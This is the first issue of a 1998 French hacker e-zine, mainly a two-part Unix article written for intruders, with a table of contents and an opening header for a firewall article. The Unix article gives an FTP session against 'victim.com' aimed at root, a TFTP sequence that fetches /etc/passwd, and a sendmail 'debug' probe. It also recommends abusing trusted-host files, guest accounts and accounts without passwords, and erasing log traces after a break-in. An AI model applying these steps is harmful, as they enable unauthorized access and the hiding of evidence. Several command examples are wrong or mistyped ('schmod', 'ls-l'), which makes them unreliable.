				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/ 
http://www.altern.org/hpclp/INDEX.HTML


"The hacking is a great drug and the apprenticeship is the source." 			



Introduction :
--------------
Premiere parution de #h/p/c/l/p... 
Hacking/Phreaking/Cracking/Linux/Programmation, voila en gros ce que vous 
pouvez trouver sur ce mag. On peut aussi trouver des news, de la T T TTT
TECHno, des trucs Coooooooooool et marrants.
Bref ce new mag qui copie NoRoute, NoWay et le reste (arf, on rigole)
et fait pour vous...
Voici donc le debut d'une longue serie. En tout K on l'espere... Ce zine est
votre zine, si vous trouvez des erreurs, si vous avez des suggestions,
ou mieux, si vous avez des txt, n'hesitez po  nous mailler  :
h_p_c_l_plemag@yahoo.com !!!! Tous sera lu et surement publie 
(sinon on vous expliquera), mais s'il vous plait faite votre file en format .txt!!! 
L'underground en a besoin.

Disclaimer :
------------
Ce txt n'inssitent personne  faire des actes illegaux. Les auteurs 
ne sont po respondables des actes des autres. 
En clair pour tous ceux que la libertes d'expression & le droit  
l'information genent : Go Get Fucked!!!

Sommaire :
----------

_________________________________________________
name of the txt  		    		|auteur	 | 
------------------------------------|------------|
1-: intro			 	      |la redac.   |
2-: disclaimer			      |la redac.   |
3-: Le systeme unix (part 1&2)      |stealthyx   |
4-: Les firewalls    	            |trom        |
5-: PGP                             |stealthyx   |
6-: le hack des newbies             |stealthyx   | 
7-: Comment hacker facilement les	|		 |
ftp, telnet, mail				|Code-BAR    |
8-: le SE                           |Tripbomb	 |
9-: hacking IRC				|SoD         |
10-:Revue de presse et des		|		 | 
evenements.					|stealthyx	 |
12-: les #, les bouquins            |            | 
& les sites interressants....	      |la redac.	 |
13-:Annonce de la redac			|la redac.	 |
____________________________________|____________|
 




				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l n1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/



          	     UU    UU   NN    NN   ii   XX    XX 
		     UU    UU   NNN   NN         XX  XX
		     UU    UU   NN N  NN   ii     XXXX
		     UU    UU   NN  N NN   ii     XXXX 
 		      UU  UU    NN   NNN   ii    XX  XX
  		       UUUU     NN    NN   ii   XX    XX   1
  


Bon, on va reprendre entierement le systeme... On abordera dans cette 
premire partie que les faille du systeme UNiX. On vera comment hacker
ce systeme dans une deuxime partie.
C pour ca que ca risque d'tre long...
A noter que je tiens c informations d'un bouquin sur la securite :
"securite reseaux", j'en remercie l'auteur:)). 



-------------------------|
I-:presentation d'UNiX : |
-------------------------|



UNiX est un systeme qui a ete cree en 1972. C un extraordinaire OS  
qui depuis la date de ca creation reste inegale en matiere de 
portabilite et d'interoperabilite. Le reseau internet est presque
entierement constitue de machine UNiX. D'ou l'importance de cet OS.

Mais en fait cet Os a une grande faiblesse : la securite... ;)))

Meme si de part son architecture, il offre une + grande securite que
ms-dos. 

Je v presenter dans le tableau si dessus les differences importantes entre
ms-dos et UNiX :

__________________________________________________________________________
|____________________________________|___________________________________|
|				    		 |                                   |
|               UNiX  		     	 |		   Ms-dos                |
|____________________________________|___________________________________| 
|                                    |                                   |
|UNiX est multi-utilisateur. C  dire|Ms-dos n'a pas ce concepte multi-  | 
|que sa securite est base sur un sys-|utilisateur. C  dire que une fois |
|teme de privileges. Les utilisateur |connecte  une machine dos tous    |
|d'UNiX ont chacun un passwd & ont   |vous est permis...                 |
|chacun des autorisations + ou -     |                                   |
|grande en ce qui concerne le reseau.|                                   |
|L'utilisateur le + interessant est  |                                   |
|le root.                            |                                   |
|____________________________________|___________________________________|
|                                    |                                   |
|Sous UNiX les programmes ne peuvent |Sous Ms-dos le programme peut      |
|pas ecrire sous n'importe quelle    |ecrire n'importe meme l ou se     |
|du HD...                            |trouve le systeme d'explotation... |
|____________________________________|___________________________________|
|                                    |                                   |
|UNiX ne permet  aucun programme de |Cela est possible sous Ms-Dos      |
|de modifier un file.                |                                   | 
|____________________________________|___________________________________|
--------------------------------------------------------------------------

Voila a peut prs les differences entre UNiX et Ms-Dos.

Meme si, on le voit dans ce tableau, UNiX est + securise que le Dos, il n'a
pas ete concu pour offrir un maximum de securite. On peut biensur rendre 
UNiX + sur mais il n'est pas configure en tant que tel dans sa version par
default ;))))) .

Si l'on configure UNiX pour qu'il soit + securise alor il faudra faire ca 
en trois parties :
-la securites des comptes
-la securites des connexions exterieurs
-la securites des fichiers et des repertoires



--------------------------------------------------|
II-Les bugs et les erreurs d'utilisation d'UNiX : |
--------------------------------------------------|



I-La securite des comptes :
----------------------------

1.Les passwd :
---------------
La securite des comptes sont surtout du aux passwords. Pour un utilisateur
UNiX, il faut choisir un passwd qui ne puisse etre devine. Par exemple 
pour l'utilisateur root, son passwd ne sera pas "root". C une question pri-
maire, mais que beaucoup d'utilisateur oublie... :))))))))))) Mais ne 
comptez pas sur cette faille, pour hacker une machine sous UNiX. Seul les 
utilisateur qui ne sont pas expert en informatique ne prennent pas guarde
 leur passwd & par consequent c utilisateurs ne sont pas trs important 
dans la pyramide des privileges... Toute fois vous pouvez essailler cette 
faille pour des reseaus tout nouveau qui n'ont pas encore ete configures...
La + part des reseau UNiX obligent leur utilisateur  changer regulirement
leur passwd :(((, mais on vera ca dans la seconde partie.

2.Les comptes obsoletes :
-------------------------
Il arrive que l'on puisse trouver des comptes obsoletes qui n'ont pas encore 
ete anul (mort de l'utilisateur, ou depart en vacance). L'administrateur 
reseau peut donc annuler ces comptes en mettant une date d'expiration des 
comptes. La encore on peut prendre la place de account :))).

3.Les comptes des visiteurs :
-----------------------------
C un cauchemar pour la securite :))). les comptes visiteurs sont 
les premiers a essailler dans un systeme UNiX recent qui n'a donc pas pu etre
configure... ;))))))))))))))

4.Les comptes sans passwd :
---------------------------
C fou, non ??? & pourtant ca existe !!! 

5.Les groupes et les comptes de groupes :
-----------------------------------------
Pour enregistrer des groupes il y a deux maniere de le faire :
a:laissez les utilisateur du groupes connectes avec le meme passwd et le meme
nom d'utilisateur. ;)))
b:editer le fichier de group /etc/group, creer le groupe et d'y associer la 
liste des utilisateur...
Le format du fichier est :
			
nom du groupe:passwd:numero d'identification:utilisateur1,utilisateur2 ....

6.Le systeme NIS :
------------------
Le systeme NIS est un moyen trs pratique de partager, entre plusieur machines
un seul fichier passwd et un seul fichier group ;))).
Par exemple si on veut changer un passwd sur un reseau, il faut le faire sur
toute les machine, lorsqu'il n'y a pas NIS. Sur les grand reseaux de 1000
becanes, c assez dur.... Voila pourkoi on a fait NIS.
NIS fonctionne ainsi : sur la machine cliente, le fichier passwd contient
une entr libellee +::0.0:: . Lorsque l'utilisateur ce connecte sur une machi-
ne client, NIS demande le login et le passwd. Au signe + prs, l'entre passwd 
est exactement la meme que celle d'un compte root sans nom d'utilisateur ni
passwd. :))) On vera en detail le systeme NIS dans une autre partie...



II-Securites des connexionx exterieures :
-----------------------------------------

Voila, on va attaquer des choses un peu plus interressantes :))).

1.Les machines equivalentes :
-----------------------------
Le mecanisme des machines equivalentes (trusted host) permet de specifier une
liste de machines ou un utilisateur ayant le meme nick sur les deux machines
peut etablir une session ou executer une commande  distance sur une machine
cible sans passwd.
Le fichier /etc/hosts.equiv contient la listes des machines equivalentes. Les
utilisateur qui ouvrent une session pas la commande rlogin ou excutent une 
commande par rsh n'ont pas a fournir de passwd ;))) s'il viennent d'une 
machine listee dans ce fichier (spoof, spoof, spoof :))).
Certaines version de UNiX sont livrees avec une seule entree dans le fichier
host.equiv : un "+". Si c le cas sur la machine convoitee et libre acce pour 
tout le monde car le "+" signifie que toutes les machines sont classees comme
equivalentes ;)))))))).
Les fichier .rhost permet  des utilisateur specifiques d'acceder a des 
becanes specifiques sans passwd. Tout utilisateur peut creer un fichier 
.rhostdans son repertoire de connexion et autoriser l'acce a son compte 
sans passwd. Tout utilisateur peut donner un acces sans passwd  n'importe
qui !!! :))))

2.Les terminaux securises :
---------------------------
Selon les versions d'UNiX, le fichier qui definie les terminaux securises est
soit : /etc/ttyab, soit : /etc/ttys. Pour autoriser le super utilisateur
a se connecter  partir d'un terminal donne, faut ajouter dans le fichier le 
mot cle "secure" a la fin de la ligne d'identification du terminal.
Si "secure" n'est pas mis a la fin de ligne d'identification du terminal, un
utilisateur etant super utilisateur peut se connecter sur un compte ordinaire
et ensuite devenir super utilisateur avec la commande "su" :))).

3.NFS :
-------
NFS (Network File System) est un protocole qui permet  plusieur machines de
partager des fichiers. Il est trs utile pour permettre aux stations sans HD
de stosker leur fichier dans une autre machine + centralisee.
Le fichier /etc/exports contient la liste des fichiers que les autres 
machines ont le droit de monter sur le reseau. Voici les differrents droit de 
ces machine :

	root=machines (machines etant la description des machines) : lorque 
l'ontvois ca, c que les machines sitees ont le droit root (ou super 
utilisateur).
	access=machines : la  ce sont seulement les machines autorisees a 
monter des repertoires...

lorqu'il n'y a pas d'option access, toutes les machines sont autorises  mon-
ter le repertoire.

/etc/exports est presente comme suit en presence de l'option access :
		/usr	access=machine1:machine2:machine3...
ou bien	/usr	root=machine1:machine2:machine3...

De plus si l'adminitrateur lors de l'edition du fichier a oublier de taper la
commande : # exportfs -a, le systeme ne relira pas forcement le fichier :))).

4.FTP (file transfert protocole):
---------------------------------
Bon. Je pense que vous connaissez. A partir de FTP on peut facilement<<<<<aquerir l'acces root, mais en ce qui concerne le fichier passwd, souvent
le droit d'acces en lecture est coupe pour ce fichier....
EX d'intrusion :

 ftp> open victim.com
 Connected to victim.com
 220 victim.com FTP server ready.
 ftp> quote user ftp
 331 Guest login ok, send ident as password.
 ftp> quote cwd ~root
 530 Please login with USER and PASS.
 ftp> quote pass ftp
 230 Guest login ok, access restrictions apply.
 

5.TFTP :
--------
Le petit frre de FTP!!! Son port est le 69a
TFTP peut presentez des brches assez grandes pour faire passer un TGV... :))
essayer donc la sequence de commandes suivantes :


evil %tftp
tftp>connect la_machine
tftp>get /etc/passwd
tftp>quit

6.Sendmail :
------------
Sendmail a aussi un gros bug de securite, meme si on a refait des versions
+ securise, parfois les entreprises mettent du temps a changer leur version.
Connectez vous au sendmail par telnet (port 25=smtp) et tapez debug...
Si la reponse n'est pas "unrecognised command", c que la version du sendmail 
est encore buge et que vous pouvez en profiter

7.Finger :
----------
le finger permet a un utilisateur distant de voir le nom complet d'un 
utilisateur, son repertoire de connexion, la date de sa derniere 
connexion, et la date ou il a lu son courrier pour la derniere fois... 

III.Securite des fichiers et des repertoires  :
-----------------------------------------------

1.Les bits de droit d'accs :
-----------------------------
Tous les fichiers et repertoires UNiX ont trois ensemble de bits de droit d'
acces associes. Le prmier ensemble definit quels sont les droits du proprio
du fichier, le second definit quels sont les droits du groupes proprio du 
file & le dernier quels sont les droits d'acces aux autres utilisateurs ;)).

Voici  quoi correspondent les bits des droits d'acces :

*droit d'acces en lecture (read).
*droit d'acces en ecriture (write).
*droit d'execution (execute).
*setuid : lorceque ce bit est positionne sur un fichier, cela signifie que le
fichier est execute avec le droit du proprietaire du fichier.
*setgid : lorceque ce bit est positionne sur un fichier, cela signifie que le
fichier est execute avec le droit du groupe proprietaire du fichier.

Si il n'y a aucun bits associe aux fichiers, tout le monde peut tout faire 
avec. ;]

2.Crypt :
---------
Crypt est un moyen de chiffrer les fichiers sous UNiX. 
Des cracker les dechiffrent assez vites. On les trouves un peu partout sur le 
net.....

3.Les peripheriques de /DEV :
-----------------------------
UNiX accede aux disques et  la memoire par l'intermedeiaire des fichiers (dit 
speciaux)du repertoire /dev mais aussi aux machines du style imprimante...
Essaillez donc d'avoir acces a ce genre de fichier, cela peut etre assez amusant
de leur imprimer certaine chose (hihi). Le + souvent seul le root
 acces  ces fichiers.



-----------------------------------|
III-: la surveillance du systeme : |
-----------------------------------|



Une fois parti de la machine que vous avez hacker croyez ne pas avoir laissez
de trace ???? Vraiment ???? :)))
Je vous demontre le contraire!!!!



I-surveillance des comptes :
----------------------------


1.le fichier /usr/adm/lastlog :
-------------------------------
Ce fichier est une trace de la date de la derniere session etablie par chaque
utilisateur. Profitez en pour savoir quand se connecte l'utilisateur que 
vous avez hacker... Ca pourra vous servir si vous comptez revenir. Je ne 
vous le conseille toute fois pas.

2.le fichier /etc/utmp :
------------------------
Le fichier /etc/utmp enregistre qui est connecte sur le moment sur le 
systeme. On peut le visualiser avec la commande who.
Soyez donc discret & evitez de faire des choses qui allerterait tout
le monde (surtout tard le soir & meme en root).

3.le fichier /usr/adm/wtmp :
----------------------------
Ce file enregistre les debuts et les fins de sessions de tous les 
utilisateurs. On peut executer la commande who sur ce fichier :

		who /usr/adm/wtmp
Pour isoler ce qui vous interresse tapez :

		last /usr/adm/wtmp   username
ou bien :

		last /usr/adm/wtmp   terminal

4.le fichier /var/adm/acct :
----------------------------
Ce file enregistre toutes les commandes executes et le user qui les a 
executes.
Pour avoir acces  ce fichier tapez :

		latscomm /var/adm/acct  username
ou bien	:	
		latscomm /var/adm/acct  terminal



II-Surveillance des connexions reseau :
---------------------------------------

1.La commande syslog :
----------------------
Avec syslog, on peut forcer n'importe quelle commandes  envoyer des 
informations, ainsi que les messages d'erreurs, vers un fichier traces tel
que /usr/adm/messages. Si vous arrivez  vous connecter sur le reseau, en 
pleine journee vous pouvez vous contenter d'effacez si vous le pouvez les 
traces d'erreurs que vous avez pu commetre, mais il est preferable d'effacer
toutes les traces que vous avez laissez sur ce fichier et sur les autres de 
jour ou de nuit.

2.La commande showmount :
-------------------------
Elle permet de voir toute les machines qui ont monte quelque chose  partir
d'un serveur NFS. Sans option elle donne simplement la liste des machines.
Avec l'option -a elle vous donne la liste des machines & des repertoires
montes. Avec l'option -d elle affiche les repertoires montes par une machine
donne. En clair si vous passez par un serveur NFS evitez de toucher aux 
fichiers. Y'a une trace de vos pas ... :(((



III.Surveillance de la securite des fichiers :
----------------------------------------------

1.la commande find :
--------------------
Voici un txt qui vient tout droit d'un bouquin sur la securite des reseaux.

"La commande find sert  rechercher des fichiers dans une arborescence selon
des critres tels que le nom, le type, les droits d'acces, le proprietaire,
les dates de modifications, etc. Elle retourne une liste de fichier qui 
satisfont aux criteres , et on peu envoyer cette liste sur une imprimante
ou bien la passer  d'autres commandes UNiX.

La syntaxe de find est la suivante : 

		% find repertoire criteres

Pour trouver tous les fichier normaux (de type f)  partir du repertoire 
racine (/), tapez :

		find / -type f

Pour afficher cette liste tapez :

	 	find / -type f -print

Pour trouver des fichiers normaux (de type f) et setuid (c'est  dire dont 
le ET logique entre les bits de droit d'acces et 4000 vaut 1), il faut utili
ser le parametre -a (and) et un syntaxe de ce type :

		find / (-type f) -a ( -perm -4000) -print

Pour trouver les fichiers normaux et setuid (4000) ou setgid (2000), tapez :

		find / (-type f) -a ( -perm -4000 -o -perm 2000) -print

Vous pouvez ensuite envoyer les rsultats de cette recherche  l'imprimante.
Si vous avez de gros diques, vous pouvez aller dejeuner en attendant les 
resultats. 

Pourquoi effectuer cette recherche ? Parce que des hackers, quand ils ont 
reussi  penetrer dans un systeme, adorent laisser derrire eux des 
programmes qui leur donnent des droits qu'ils ne devraient pas avoir. Si 
la commande find vous permet de trouver de tels programme etudiez les 
attentivement et voyer pourquoi ils ont de tels droit d'acces. Ensuite, vous
pourrez decider soit de detruire le fichier, soit de modifier les droits
d'acces, soit encore d'entreprendre un autre type d'action. Les programmes
setuid et setgid se trouvent normalement dans /bin/etc, /usr/bin, /usr/ucb et
/usr/etc. des programmes de ce types situes ailleurs, et particulierement 
dans la racine, peuvent etre la cause  de problemes. Si votre systeme est un
UNiX de Sun, vous pouvez egalement supprimer le bit setuid de 
/usr/etc/restore, car il s'agit d'une breche de securite interressante pour
un hacker. Utilisez la commande chmod pour cela."

Bon, vous savez maintenant qu'il ne faut pas sous estimer les possibilites 
des administrateur reseau. Je vous conseille personnellent de ne pas laisser
de fichier comme des chevaux de troie, cela ne vous sert  rien puisque 
il est preferable de ne pas revenir sur les becanes que vous avez hacke et 
puisque l'administarteur reseau peut trs bien retrouver votre prog. :(((
Mais comme y'en  peu qui font bien leur boulot, vous pouvez toujour 
tenter le coups !!!!  :)))))))))))


--------------------------------------------
IV-: Bonus : liste des ports (non exaustif)|
--------------------------------------------
  discard                  9
  netstat                 15
  chargen                 19  
  ftp                     21  
  telnetd                 23  
  smtp                    25  
  rlp                     39  
  bootp                   67
  fingerk                 79  
  http                    80 / 8080
  military http           80 / 8080 / 5580  
  link                    87  
  pop3                   110
  identd                 113  
  nntp                   119  
  newsk                  144  
  execk                  512  
  login                  513  
  pkill                  515  
  ktalk                  517  
  ntalk                  518  
  netwall                533
  rmontior               560  
  montior                561
  kerberos               750

----------------------------------------------------------------------------

                            ii 
     uu   uu  nn  nnn             x  x 
    uu   uu   nn n  n       ii     xx
  uuu   uu    nnn   n      ii      xx
 uu uu uuuu   nn    n  ii ii i    x  x
uu   uu   uu  nn    n   ii    i  x    x   2

Generalite sur le systeme UNiX...

INTRO:
------
Ce txt est inspire de nombreux documents en anglais, que l'on peut trouver
sur le net & aussi de nombreux bouquins sur UNiX... Je remercie par avance
tout les auteurs qui ont contribue a mon apprentissage. La liste serais trop
grande pour etre sitee ici mais je peu en gros vous siter :
Sir Hackalot, Red Knight, Deicide ,Dan Farmer & Wietse Venema. Et beaucoup
d'autre...
 



OUAAAA, me revoila  !!!!
Bon on y go sinon on finira jamais....

Attention !!! Je vous recommande fortement d'acheter un bouquin sur le 
systeme UNiX. Cette article, comme le precedant n'est pas exostif.

-------------
I-Le kernel |
-------------

C le coeur d'une machine roulant sous UNiX. 
Il s'occuppe des fichiers system, de l'usage de la memoire, & des procedes
software et hardware. Il

-------------
II-Le shell |
-------------

Le shell est un programme .exe qui se lance quand un utilisateur se log sur
la machine. Le shell peut etre n'importe lequel programme executable
et il est defini dans le passwd file. Le shell que l' on utilise le plus 
souvent est un "traducteur de commande". Un peu comme le command.com de 
ms-dos. 

---------------------------
III-Le systeme de fichiers|
---------------------------

Je v vous faire un petit shema avant de continuer :

       |--/unix
       |
       |--/etc|--/passwd
       |      |--/bin
       |      |--/group
       |      |--/profile
       |      |--/utmp
Systeme|      |--/conf
UNiX --|      |--/motd
en     |     etc...
general|
       |--/dev              |--/duke3d
       |                    |
       |--/tmp     |--/jeu|--/command&conquer
       |           |
       |--/lib     |--/annuaire
       |           |
       |--/usr|--/X|--/mail
       |      |    |        
       |      |    |--/bin    |--/celullaire
       |      |    |          |
       |      |    |--/travail|--/plan-telephonique
       |      |    
       |      |    
       |      |--/Y|--/travail
       |      |    |
       |      |    |--/mail
       |      |
       |      |-etc....
       |
       |--/bin
       | 
      --/root ou /

Voila je vous ai presente en gros le panorama (tres minimaliste, mais c l'
essentiel) d'un root dans un systeme UNiX. C un "directory" ou repertoire root 
Maintenant on va voir ce que represente ces fichiers...

/unix : c la ou se trouve le kernel. Un peu le c:\windows sous un pc sous 
winmerde.

/etc : le fichier qui nous interressera beaucoup... Il contient tout les 
fichier qui interressent l'administrateur reseau, /passwd, /group...

/dev : il contient tous les fichiers concernant l'utilisation de machines 
exterieur du type imprimante...

/tmp : temporary files

/lib : repertoire qui contient des programmes d'un haut niveau de language.

/usr : je crois que d'apres le shema vous pouvez comprendre...

/bin : contient des programmes executable.

En fin le /root ou / contient :
/install :   votre avie ???
/save :     "   "     "  """
/mnt :-----------|
/bck :           |- ??? (ca serait bien que ceux qui connaisse l'utilites de ces  
/lost+found -----|  fichiers me mail. merci)

voila en gros le systeme de fichier qui tourne sous un UNiX. N'oubliez pas
que je n'ai pas l'intention de faire un file exaustif, c seullement pour 
eclairer votre root (hahahaha).

----------------------
IV-Les commandes UNiX|
----------------------

Nous ne verons pas toutes les commandes ici...

ls=
------
il vous permet d'avoir des renseignement sur un repertoire, ce qu'il 
contient, etc...

ex:

	$ ls /usr/x  //ici on demande des infos sur le file usr/x 
        jeu   
	annuaire
	mail
	bin
	travail

ls-l= 
-------
elle vous permet d'avoir de plus ample information sur les file d'un 
repertoire.

ex:

	$ ls-l /usr/x
	d rwxr-x---  x  #h/p/c/l/p  10450  05/09/98  2:09  jeu
	d rwxr-----  x  #h/p/c/l/p  9020  29/08/98  8:12  annuaire  
	d rwx------  x  #h/p/c/l/p  10030  05/09/98  14:15  mail  
      d rwxr-x---  x  #h/p/c/l/p  20012  05/09/98  11:48  bin   
 	d rwxr-x---  x  #h/p/c/l/p  15421  05/09/98  12:09  travail

	1   2	       3   	   4  	5       6       7	      8


1 : le type de fichier : il en existe trois : 
-les repertoires
-les fichiers ordinaires (textes, courriers, source de programmes,.exe,etc.)
-les fichiers speciaux (pour la gestion du systeme, donc interressant)
2 : le bit de droit d'acces
Comme je vous l'ai dit dans mon dernier article il exite des bit de droit 
d'acces, dont voici un exemplaire. Il se divise donc en trois parties de 
trois caractere (il y a 9 caracteres).
La premier partie concerne le propio du file (u)
La deuxieme partie concerne le groupe du proprio (g)(avec lequel il travail)
La troisieme concerne un utilisateur externe au groupe.(o)
Dans les trois cas il existe trois droit d'acces qui sont designe par trois
lettre respective :
r : droit de lecture (Read)
w : droit d'ecriture (Writte)
x : droit d'execution (eXecute)
le - indique qu'il n'y a aucun droit accorde
3 : le proprio du file
4 : le groupe auquel le proprio appartient ou travaille
5 : memoire en ko
6 : la date de la derniere lecture
7 : l'heure de la derniere lecture
8 : le nom du fichier

Dans notre exemple : 
-le proprio a le droit de lecture, ecriture, execution sur tout les fichier de
son repertoire.
-le groupe du proprio a le droit de lecture & execution sur les fichiers /jeu,
/bin & /travail ; il a le droit de lecture sur le fichier /annuaire.
-les autres users n'ont aucun droit.

cat=
------
Cette commande vous permet de lire un fichier sur l'ecran (des fichier txt
naturellement), si vous en avez la permition.

ex:
	$ cat /usr/x/mail/y--x/lettre112014.txt
	line one x
	line two t qu'un pauv con
	line three vivement qu'on te vire...
	line four y.

cd=
-----
Cette commande permet de changer de repertoire.

ex:
	$ cd /user   //on est a present dans le repertoire /usr, on etait 
	 	     //dans le repertoire /root ou /
		      	
	$ ls	     //comme on se trouve dans le repertoire /usr on a po  
		     //besoin de mettre ls /usr.
	x
	y
	mike
	loulou
	kiki
	etc...

cp=
-----
Avec ca on peut copier un fichier. $ cd [fichier a copier] [destination]

ex:	$ cd /
	$ ls
	unix
	etc
	dev
	tmp
	lib
	usr
	bin
	$ cp usr usr2
	$ ls
	unix
	etc
	dev
	tmp
	lib
	usr
	bin
	usr2      //ah bon ???? plus de memoire ??? merde !!! [panique]

mv=
-----
Pour changer les noms des files : $ mv [ancien nom] [nouveau nom]

ex:
	$ mv usr2 a-effacer
	$ ls
	unix
	etc
	dev
	tmp
	lib
	usr
	bin
	a-effacer

pwd=
------
Pour savoir dans quel repertoire on est :

ex:
	$ pwd
	/
	$ cd /a-effacer
	$ pwd
	/a-effacer
	$ ls
	x
	y
	mike
	loulou
	kiki
	etc...
	$ cd ..     //les 2 . renvois au dernier repertoire visite
	$ pwd
	/
	$ cd $home  //$home renvoie au repertoire de l'utilisateur
	$pwd
	/	    //je suis root


rm=
-----
pour supprimer un fichier : $ rm [fichier a supprimer] ou rm-r [repertoire a
supprimer]

ex:
	$ rm /usr/x/mail/y--x/lettre112014.txt
	$ ls /usr/x/mail/y--x
	lettre1.txt
	lettre2.txt
	lettre3.txt
	     :
	     :
	     :
	lettre112013.txt
	$ rm-r /a-effacer
	$ ls
	unix
	etc
	dev
	tmp
	lib
	usr
	bin	

write=
--------
l'une des commandes les plus cooool : le chat. write [nom de l'utilisateur]

ex:
	$ write y
	y has been notified
        Ho! salope ou t'es ???
        Message from y on tty12014 at 15:17
        qu'est ce tu veux connard ??       
	Pourkoi tu m'a insulte comme ca dans ton mail ???
	Message from y on tty12014 at 15:17
	parecque t qu'un enfoire qui ma rendu cocu! salaud
	toi t qu'une pute qui se vent alor ferme la
	$ control-D    //pour ce barrer parceque sinon on a po fini :))
     
who=
------
Pour savoir qui est connecte :
	
ex:
	$ who
	login         term       logontime
	y	  +   tty12014   08:00
	mike	  +   tty12014   02:31	  
      loulou  +   tty12014   10:09 
	kiki	  -   tty12400   06:56

Le + indique qu'on peut chater avec le mec le - indique le contraire

sz=
---
envoyer via un zmodem
ex :
	$ sz [+nom fichier]
	ready to send
rz=
---
recevoir via un zmodem
ex :
	$ rz [+nom fichier]

rx-sx=
-------
Pareil sauf que c pour les xmodem

ed =
------
Un editeur de texte.
Voici c differentes fonctions non exostives :
* a ou a = averti la machine que vous allez ecrire.
* l [+nomfichier] ou l [+nomfichier] = load un fichier
* s [+nomfichier] ou s [+nomfichier] = sauve le fichier
*q ou q = quitter l'editeur

ex :
	$ ed Pour Y
	0			// ligne zero
	* a                     // pour commencer a ecrire
	Ma chere petite conne :
	Sache que je t'emmerde!
	* 1
	Ma chere petite conne :
	* a
	Pour finir je veux te dire un truc :
	tu prendra pas la place du patron en le sucant!
	[controll-z]
	*0a			//ajoute quelque chose apres la ligne zero
	Objet : pour mieux t'enculer.
	* w
	63
	* a
	En plus je suis pas radains g gaspille 42 bytes pour t'ecrire se 
	message.
	* w
	74
	* q

(aujourd'hui, il existe un editeur oriente ecran, non pas ligne comme ed et
ex(un autre editeur).

chmod =
--------
Permet de changer les droits d'acces. Il ne peut etre utilise que par le 
proprio du fichier concerne.

ex:
	$ ls-l /etc
	-rwx------  root  #h/p/c/l/p  10450  05/09/98  2:09  bin
	-rwx------  root  #h/p/c/l/p  90203  29/08/98  8:12  passwd
	-rwx------  root  #h/p/c/l/p  10030  05/09/98  14:15  group  
      -rwx------  root  #h/p/c/l/p  20012  05/09/98  11:48  profile  
 	-rwx------  root  #h/p/c/l/p  15421  05/09/98  12:09  utmp
	-rwx------  root  #h/p/c/l/p  10014  05/10/99  11:02  conf
	-rwx------  root  #h/p/c/l/p  12240  05/12/01  12:02  motd
	$ schmod o+w,o+r,o+x passwd //ici on met les droits rwx aux exterieurs
	$ls-l /etc/passwd
	-rwx---rwx  root  #h/p/c/l/p  90203  29/08/98  8:12  passwd//cool !
	$ schmod u-w,u-r,u-x passwd
	-------rwx  root  #h/p/c/l/p  90203  29/08/98  8:12  passwd//arf!
	
on peut utiliser cette commande autrement :
|proprio     |groupe  |autre utilisateur (externe)|
|r;w;x       |rwx     |rwx             		  |
|400;200;600 |40;20;10|4;2;1				  |

ex :
	$ ls-l /etc
	-rwx------  root  #h/p/c/l/p  10450  05/09/98  2:09  bin
	-------rwx  root  #h/p/c/l/p  90203  29/08/98  8:12  passwd
	-rwx------  root  #h/p/c/l/p  10030  05/09/98  14:15  group  
      -rwx------  root  #h/p/c/l/p  20012  05/09/98  11:48  profile  
 	-rwx------  root  #h/p/c/l/p  15421  05/09/98  12:09  utmp
	-rwx------  root  #h/p/c/l/p  10014  05/10/99  11:02  conf
	-rwx------  root  #h/p/c/l/p  12240  05/12/01  12:02  motd
	$ schmod 700 passwd  //400+200+100=700
	$ls-l /etc/passwd
	-rwx------  root  #h/p/c/l/p  90203  29/08/98  8:12  passwd
	$ schmod 777 passwd  //400+200+100+40+20+10+4+2+1=777
    	$ ls-l
	-rwxrwxrwx  root  #h/p/c/l/p  90203  29/08/98  8:12  passwd
	$ schmod 444 passwd
	$ ls-l
	-r--r--r--  root  #h/p/c/l/p  90203  29/08/98  8:12  passwd
	...

chown & chgrp =
---------------
La commande chown permet de changer le proprietaire, la commande chgrp
parmet de changer le groupe.
ex:
	$ schown stealthyx /etc
	$ ls-l /
	drwxrwxrwx  stealthyx #h/p/c/l/p 11201254  21/09/98  9:30 etc
	.....
	$ schgrp system /etc
	$ ls-l /
	drwxrwxrwx  stealthyx system  11201254  21/09/98  9:30 etc
	...

----------------------------------
V-: quelques caracteres speciaux |
----------------------------------

Control-D : Cette commande permet de stope l'application que vous utilisez,
le mail, l'editeur, etc. Quand vous etes sur le shell le fait d'appuyer sur
ces deux touches vous deconnecte.

Control-J: Sur certain systeme UNiX cette combinaisons de touche 
<==> "enter"

? : ex : /cat?sol
UNiX va chercher tout les "mots" commencant par cat et finissant par sol.
Le ? signifie qu'il pourra mettre entre le debut et la fin du mot des lettres
entre a et z et de nombres entre 0 et 9.

* : ex : /cat*
Le systeme va chercher tout les mots commencant par cat :
cat, cattttt, catretr, catffff, etc.
    ex : /cat*hhh
La il va chercher tout les mots commencant par cat et finissant par hhh :
catthsjdhhh, catdfggdsjhhh, catburgerhhh, etc.

[] - ex : /cat[c,v,f]hhh
Unix vas trouver donc : catchhh, catvhhh et catfhhh
     ex : /cat[a-z][A-Z][0-9999]hhh
bon je vais pas mettre tous ce que UNiX va chercher (faut po rever!!!).

bon pour le reste je vous le laisse en anglais :

> - le caractere special > permet de creer ou d'ecraser un fichier deja 
existanr :
	$ ls usr/y
	mail
	travail
	$ ls > travail   // la le fichier sera ecrase
	$ ls usr/y
	mail
	travail
	$ ls > jeu	     // ici le fichier sera creer
	jeu
	mail
	travail

>> - pour rajouter la date ou le chemin d'acce dans la liste d'un repertoire
sans ecrase le fichier qui suit le carcatere special >>. Si le nom qui suit
>> n'est pas un fichier, alor ce fichier est cree

| - pipeline : 
	$ ls /usr | wc-l    //dit combien de fichier ou rertoire il ya a.
	2
	$ ls /usr
	x
	y

Y'en a plein d'autre mais je v po tous vous les donner. A vous de chercher.
-------------
EEENNNDDD   |
-------------
Voila c a peu pres (tres a peu pres) tout ce que dont a besoin de connaitre
lorsqu'on hack une machine (ormis la programmation du shell, que j'essairai
d'expliquer dans une prochaine partie)

										@+++++

----------------------------------------------------------------------------
stealthyx@yahoo.com pour toutes remarques  propos de cet art.
----------------------------------------------------------------------------
	 


				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/

                   .                            .
                  /|\  LES FIREWALLS PAR TROM  /|\
		     / | \	                      / | \
                 \ | /   Kortex agency 1998   \ | /


							
